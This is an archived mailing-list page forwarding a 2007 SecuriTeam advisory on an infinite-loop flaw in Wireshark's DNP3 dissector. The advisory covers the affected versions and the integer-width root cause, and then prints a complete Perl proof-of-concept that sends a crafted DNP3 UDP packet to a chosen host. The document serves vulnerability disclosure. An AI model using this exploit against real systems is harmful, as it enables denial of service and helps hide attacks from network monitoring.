ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Wireshark DNP3 Dissector Infinite Loop Vulnerability



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, August 30, 2007 10:52 AM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> Wireshark DNP3 Dissector Infinite Loop Vulnerability
>
>
>
> A vulnerability in Wireshark's DNP3 dissector allows
> attackers to cause it to enter an infinite loop which in turn
> can be used to mask other types of attacks from being
> captured by Wireshark.
>
>
> Vulnerable Systems:
>  * Wireshark version 0.99.5 and prior
>
> Immune Systems:
>  * Wireshark version 0.99.6 and newer
>
> A vulnerability in the way Wireshark handles DNP3 data allows
> an attacker to fool the dissector into thinking a negative
> value of items has been provided to it as part of the
> Application Layer's request to read/write objects. This in
> turn causes the loop found in the code:
> for (temp16 = 0; temp16 < num_items; temp16++)
> {
>
> To enter into an infinite loop as the temp16 parameter is
> defined as an unsigned int of a length of 16 bits while the
> num_items is defined as an unsigned int of a length of 32
> bits - which in turn means than a negative value will be
> casted into a larger than 16 bits value - as the temp16 will
> not be able to reach the value stored in the num_items parameter.
>
> Proof of Concept:
> The vulnerability can be recreated by either using beSTORM
> <http://www.beyondsecurity.com/bestorm_overview.html>  with
> the DNP3 protocol fuzzer and monitoring the traffic generated
> with Wireshark or by launching the following exploit code:
> #!/usr/bin/perl
> # Automatically generated by beSTORM(tm)
> # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
>
> # Attack vector:
> # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
>
> # Module:
> # DNP3
>
> use strict;
> use warnings;
>
> use Getopt::Std;
> use IO::Socket::INET;
>
> $SIG{INT} = \&abort;
>
> my $host = '192.168.4.52';
> my $port = 20000;
> my $proto = 'udp';
> my $sockType = SOCK_DGRAM;
> my $timeout = 1;
>
> #Read command line arguments
> my %opt;
> my $opt_string = 'hH:P:t:';
> getopts( "$opt_string", \%opt );
>
> if (defined $opt{h}) {
>     usage()
> }
>
> $host = $opt{H} ? $opt{H} : $host;
> $port = $opt{P} ? $opt{P} : $port;
> $timeout = $opt{t} ? $opt{t} : $timeout;
>
> my @commands = (
> {Command => 'Send',
>  Data =>
> "\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08},
> {Command => 'Receive'},
>
> );
>
> ###
> # End user configurable part
> ###
>
> #1. Create a new connection
> my $sock = new IO::Socket::INET (
>                 PeerAddr => $host,
>     PeerPort => $port,
>     Proto => $proto,
>                 Type => $sockType,
>                 Timeout => $timeout,
>             )
>     or die "socket error: $!\n\n";
>
> print "connected to: $host:$port\n";
>
> $sock->autoflush(1);
> binmode $sock;
>
> #2. communication part
>
> foreach my $command (@commands)
> {
>     if ($command->{'Command'} eq 'Receive')
>     {
>         my $buf = receive($sock, $timeout);
>         if (length $buf)
>         {
>             print "received: [$buf]\n";
>         }
>     }
>     elsif ($command->{'Command'} eq 'Send')
>     {
>         print "sending: [".$command->{'Data'}."]\n";
>         send ($sock, $command->{'Data'}, 0) or die "send
> failed, reason: $!\n";
>     }
> }
>
> #3. Close connection
> close ($sock);
>
> #The end
>
> sub receive
> {
>  my $sock = shift;
>  my $timeout = shift;
>
>  my $tmpbuf;
>  my $buf = "";
>
>  while(1)
>  { # Example from perldoc -f alarm
>   eval {
>     local $SIG{ALRM} = sub { die "timeout\n" };
>     alarm $timeout;
>
>     my $ret = read $sock, $tmpbuf, 1; #We read data one byte
> at a time.
>     if ( !defined $ret or $ret == 0 )
>     { #EOF
>         die "timeout\n";
>     }
>
>     alarm 0;
>     $buf .= $tmpbuf;
>   };
>   if ($@) { #time out
>     if($@ eq "timeout\n")
>     {
>         last;
>     }
>     else {
>         die "receive aborted\n";
>     }
>   }
>  } #while
>  return $buf;
> }
>
> sub abort
> {
>     print "aborting...\n";
>     if ($sock)
>     {
>         close $sock;
>     }
>     die "User aborted operation\n";
> }
> sub usage
> {
>  print "usage: $0 [-hHPt]\n";
>  print "-h\t: this help message\n";
>  print "-H\t: override default host - $host\n";
>  print "-P\t: override default port - $port\n";
>  print "-t\t: set socket timeout in seconds\n";
>  exit 0;
> }
>
>
> Additional Information:
> The information has been provided by beSTORM.
> The original article can be found at:
> http://www.beyondsecurity.com/bestorm_overview.html
>
>



 




Copyright © Lexa Software, 1996-2009.